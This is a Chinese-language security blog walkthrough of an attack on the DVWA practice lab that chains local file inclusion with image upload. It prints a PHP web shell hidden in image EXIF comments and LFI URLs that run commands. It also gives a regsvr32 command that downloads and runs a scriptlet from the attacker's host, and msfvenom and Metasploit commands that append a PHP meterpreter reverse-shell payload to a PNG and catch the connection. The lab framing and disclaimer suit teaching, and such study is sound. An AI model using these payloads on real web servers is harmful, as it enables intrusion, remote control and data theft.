利用 LFI 和文件上传进行 Web 服务器攻击

admin 2024年12月22日02:30:08评论13 views字数 2536阅读8分27秒阅读模式

在本文中,您将了解如何通过 FILE INCLUSION 漏洞绕过高安全性中的文件上传漏洞。以及如何绕过本地文件包含以获取受害者 PC 的反向连接。

攻击者:kali Linux

目标:Dvwa

首先,您需要此处下载Exif Pilot工具。这是一个适用于 Windows 用户的 GUI 工具,允许在 JPEG、PNG 和 GIF 图像中添加 exif 数据和元数据。

现在打开 exif pilot插入任意图像来隐藏其中的恶意评论;从截图中,你可以看到我选择了shell.png图像,然后单击EDIT EXIF/IPTC

利用 LFI 和文件上传进行 Web 服务器攻击
进一步在评论文本字段
类型内
<?php system($_GET['c']); ?>
作为恶意代码并单击确定。
利用 LFI 和文件上传进行 Web 服务器攻击
此处已成功编辑图片中的 exif 数据。此工具将恶意图片从同一文件夹中的原始图片中替换,并将原始图片发送到回收站。
利用 LFI 和文件上传进行 Web 服务器攻击

现在在浏览器中探索目标 IP,并使用admin: password作为凭据登录 DVWA 。将安全级别设置为高。

利用 LFI 和文件上传进行 Web 服务器攻击

选择漏洞
文件上传,在Web服务器应用程序中上传恶意图像,然后浏览您的恶意图像shell.png,然后单击上传。
利用 LFI 和文件上传进行 Web 服务器攻击
它将显示上传图像的路径,复制突出显示的路径。
利用 LFI 和文件上传进行 Web 服务器攻击
现在在浏览器中打开复制的路径,您将在其中找到上传的图像。
利用 LFI 和文件上传进行 Web 服务器攻击

为了执行恶意代码,我们需要更改漏洞类别以及安全级别,以便我们可以执行图像内的隐藏注释。

现在将安全级别设置为低。

为了绕过DVWA高安全性中的文件上传漏洞,我们需要设置其他漏洞,为此我选择了文件包含。

文件包含允许用户通过 URL 执行任何文件,正如我上面所描述的。

利用 LFI 和文件上传进行 Web 服务器攻击

现在将上面复制的上传图像的路径粘贴到 URL 中,如屏幕截图所示。
http://192.168.1.102/dvwa/vulnerability/fi/?page=../../hackable/uploads/shell.png
这里给出了
警告系统():无法执行空白命令
,这意味着我们需要添加一些命令来执行,因此通过 URL 我们将能够执行任何命令。
利用 LFI 和文件上传进行 Web 服务器攻击
http://192.168.1.102/dvwa/vulnerability/fi/?page=../../hackable/uploads/shell.png&c=ifconfig
在这里我尝试检查受害者电脑的网络配置,您可以从屏幕截图中看到网络配置的结果。
利用 LFI 和文件上传进行 Web 服务器攻击
http://192.168.1.102/dvwa/vulnerability/fi/?page=../../hackable/uploads/shell.png&c=dir
在这里您可以查看我在 URL 中执行 dir 命令所获得的目录。
利用 LFI 和文件上传进行 Web 服务器攻击

接下来我将尝试使用 Kali Linux 实现 meterpreter 会话

输入msfconsole并加载 metasploit 框架。

use exploit/windows/misc/regsvr32_applocker_bypass_servermsf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103msf exploit(regsvr32_applocker_bypass_server) > set lport 1234msf exploit(regsvr32_applocker_bypass_server) > exploit
复制
上述恶意代码并发送给受害者。
利用 LFI 和文件上传进行 Web 服务器攻击
将上面的.dll 恶意代码
粘贴到 URL 中,当您在浏览器中运行该代码时,攻击将获取受害者在 Kali Linux 上的 meterpreter 会话。
http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll
meterpreter sessions 1meterpreter>sysinfo
利用 LFI 和文件上传进行 Web 服务器攻击

第二种方式

在第二部分中,我们将尝试将恶意 PHP 文件与图像结合起来,进一步使用该恶意图像上传到 Web 应用程序服务器,然后以与上述相同的方式绕过该图像。

首先,您需要下载任意.png/.jpg/.gif 图像并将其保存桌面上。在 Kali Linux 中,我下载了一张图片并将其保存在桌面上,名称为“a.png” 。现在打开终端并输入以下命令在“a.png”图像中生成PHP 代码

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >> /root/Desktop/a.png
利用 LFI 和文件上传进行 Web 服务器攻击
让我们验证一下图片中是否包含恶意代码
cat /root/Desktop/a.png
当您向下滚动窗口屏幕时,您会发现图像的末尾部分包含 PHP 代码。这意味着我们已成功创建恶意图像,并准备将其上传到 Web 应用程序服务器中。
利用 LFI 和文件上传进行 Web 服务器攻击

现在重复上述过程,在 DVWA 中以高安全级别上传文件。从给出的屏幕截图中,您可以看到我的“ a.png ”图像已成功上传到 Web 服务器中。

复制图像上传的突出显示的路径。

利用 LFI 和文件上传进行 Web 服务器攻击
在 Web 服务器中执行图像之前,在 Kali Linux 内部的后台
启动 multi/handler
msf > use multi/handlermsf exploit(handler) > set payload php/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.1.103msf exploit(handler) > set lport 4444msf exploit(handler) >exploit
利用 LFI 和文件上传进行 Web 服务器攻击
再次在 DVWA 中将安全级别
设置为低
打开文件包含漏洞
并重复与上述相同的过程,现在将上面复制的上传图像的路径
粘贴
到 URL 中并执行它,这将在 Kali Linux 上提供反向连接。
http://192.168.1.102/dvwa/vulnerability/fi/?page=../../hackable/uploads/a.png
利用 LFI 和文件上传进行 Web 服务器攻击
我已获得受害 PC 的 meterpreter 会话
利用 LFI 和文件上传进行 Web 服务器攻击

原文始发于微信公众号(三沐数安):利用 LFI 和文件上传进行 Web 服务器攻击

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月22日02:30:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用 LFI 和文件上传进行 Web 服务器攻击https://cn-sec.com/archives/3536535.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息